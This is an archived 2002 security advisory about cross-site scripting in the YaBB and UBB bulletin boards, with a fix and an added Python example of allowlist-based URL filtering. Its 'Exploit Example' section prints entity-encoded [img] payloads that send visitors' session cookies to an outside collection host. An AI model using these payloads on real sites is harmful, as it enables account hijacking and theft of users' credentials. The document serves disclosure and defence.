CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]

From: Obscure (obscureat_private)
Date: Tue Jan 08 2002 - 15:11:59 PST


    Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]
    Release Date: 08/01/2002
    
    Application: YaBB and UBB
    
    
    Platform: Any system supporting Perl.
    
    Build:
    YaBB : 1 Gold - Service Pack 1 - older versions were affected in the same way.
    UBB : Ultimate Bulletin Board™ 6.2.0 Beta Release 1.0
    
    
    Severity: Malicious users can steal session cookies, allowing administrative
    access to the bulletin board.
    
    Author:
    Obscure^
    [ obscureat_private ]
    
    Vendor Status:
    YaBB - Informed on 01 Jan 2002, should fix some time in the future ...
    UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems like
    they knew about the issue).
    
    Web:
    
    http://yabb.xnull.com
    http://www.infopop.com/products/ubb/
    http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html
    
    
    Background.
    
    (extracted from
    http://yabb.xnull.com)
    
    YaBB is a leading provider of FREE, downloadable Perl forums for webmasters,
    with currently over 50,000 web communities using YaBB worldwide, and over 1
    million registered users throughout these forums! Join the messaging
    revolution; keep visitors coming back....
    
    (extracted from
    http://www.infopop.com/products/ubb/)
    The Ultimate Bulletin Board (UBB)™ is the most widely adopted Perl message
    board on the Web. With a solid five year development history, and worldwide
    familiarity, it is easy to use and maintain.
    
    Problem.
    
    When a user inserts [IMG]url[/IMG], YaBB rewrites that text to <img src='url'>.
    If someone inserts javascript:alert() in place of the URL, the JavaScript is
    executed by Internet Explorer and some other web browsers whenever the post
    is viewed (a cross-site scripting bug, the "CSS" of the title). This allows
    stealing of cookie data, among other things. YaBB does filter the literal
    string javascript:, but it does not take into account that javascript: can
    be written using standard HTML hex and ASCII (numeric character reference)
    encoding, which the browser decodes back to the original text before it
    interprets the URL. The same applies to UBB.
    In UBB I need to encode several strings because they added checking for
    certain keywords such as cookie.
    In my example I change javascript: to javascr&#x69;pt:
    
    
    Exploit Example.
    
    Inserting a new topic (or reply) with the following text will send each
    visitor's cookies to Eye on Security. The output is saved to
    http://eyeonsecurity.net/tools/cookies.txt .
    In the case of UBB the cookies contain the password; in YaBB they contain a
    session cookie (or the encoded password).
    
    -- snap YaBB --
    
    [img]javascr&#x69;pt:document.write
    ('&#x3cimg
    src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(docu
    ment.cookie)+'&#x3e')
    [/img].
    
    -- snap YaBB --
    
    -- snap UBB --
    
    [IMG]javascr&#x69;pt:document.wr&#x69;te
    &#x28;'<img%20src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?
    
    cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29;
    [/IMG]
    
    -- snap UBB --
    
    
    Fix.
    
    The URL inside an IMG tag should be required to start with http, so that
    javascript: and other goodies (play with mailto:) are not allowed.
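    The filter bypass described under "Problem" and the http-only rule proposed
    under "Fix", as an added example written for this page in Python. It is not
    YaBB or UBB code (both are Perl); the function names, the ALLOWED_SCHEMES
    list and the three sample posts are my own. naive_img_rewrite reproduces the
    blacklist that the entity-encoded scheme slips past; safe_img_rewrite applies
    the allowlist fix after decoding the character references a browser would
    decode anyway, so the check sees the same scheme the browser will.

```python
"""Added example: BBCode [img] rewriting, blacklist (bypassable) vs. scheme allowlist.

Illustrative Python, not YaBB or UBB code. Function names, ALLOWED_SCHEMES and
the sample posts below are constructed for this example.
"""
import html
import re
from urllib.parse import urlsplit

# Match [img]...[/img] case-insensitively; both boards accept [img] and [IMG].
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)

# The advisory's fix: only URLs that start with http (or https) may become <img>.
ALLOWED_SCHEMES = ("http", "https")


def naive_img_rewrite(text: str) -> str:
    """Blacklist rewrite in the spirit the advisory describes: the literal
    string 'javascript:' is filtered, but the raw text is otherwise copied
    straight into the src attribute. Character references such as &#x69;
    are never decoded here, so 'javascr&#x69;pt:' passes, and the browser
    decodes it back to 'javascript:' when it parses the attribute."""
    def repl(m):
        url = m.group(1)
        if "javascript:" in url.lower():
            return ""  # drop the whole tag
        return f"<img src='{url}'>"
    return IMG_TAG.sub(repl, text)


def normalize_url(raw: str) -> str:
    """Undo what a browser undoes before it interprets the scheme: decode HTML
    character references (hex and decimal), then strip whitespace and control
    characters, which browsers ignore inside a scheme."""
    decoded = html.unescape(raw)
    return "".join(ch for ch in decoded if ch.isprintable() and not ch.isspace())


def is_allowed_image_url(raw: str) -> bool:
    """Allowlist check implementing the advisory's fix: after normalization the
    URL must use http or https; javascript:, mailto: and every other scheme
    are rejected."""
    scheme = urlsplit(normalize_url(raw)).scheme.lower()
    return scheme in ALLOWED_SCHEMES


def safe_img_rewrite(text: str) -> str:
    """Allowlist rewrite: only http(s) URLs become <img>; anything else is
    rendered as escaped text so no markup is emitted for it."""
    def repl(m):
        raw = m.group(1).strip()
        if not is_allowed_image_url(raw):
            return html.escape(m.group(0))
        # Escape the decoded URL so quotes cannot break out of the attribute.
        return f"<img src='{html.escape(normalize_url(raw), quote=True)}'>"
    return IMG_TAG.sub(repl, text)


# Constructed sample posts, modelled on the advisory's description.
BENIGN = "[img]http://example.com/pic.png[/img]"
LITERAL = "[img]javascript:alert()[/img]"        # caught by the blacklist
ENCODED = "[img]javascr&#x69;pt:alert()[/img]"   # slips past the blacklist

if __name__ == "__main__":
    for post in (BENIGN, LITERAL, ENCODED):
        print("post  :", post)
        print("naive :", naive_img_rewrite(post))
        print("safe  :", safe_img_rewrite(post))
        print()
```

    Run it and the third post is the advisory's point: the naive rewrite emits
    <img src='javascr&#x69;pt:alert()'>, which the browser's attribute parser
    decodes to a javascript: URL, while the allowlist rejects it because the
    decoded scheme is not http or https. Checking the scheme after decoding,
    rather than searching the raw text for forbidden words, is what closes the
    "encode it differently" class of bypasses, and the same check can be
    reused for any other tag that takes a URL.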
    
    
    Note.
    
    Other Bulletin Board Systems may also be vulnerable to these attacks.
    
    
    Disclaimer.
    
    The information within this document may change without notice. Use of
    this information constitutes acceptance for use in an AS IS
    condition. There are NO warranties with regard to this information.
    In no event shall the author be liable for any consequences whatsoever
    arising out of or in connection with the use or spread of this
    information. Any use of this information lays within the user's
    responsibility.
    
    
    Feedback.
    
    Please send suggestions, updates, and comments to:
    
    Eye on Security
    mail : obscureat_private
    web : http://www.eyeonsecurity.net
    



    This archive was generated by hypermail 2b30 : Wed Jan 09 2002 - 11:46:45 PST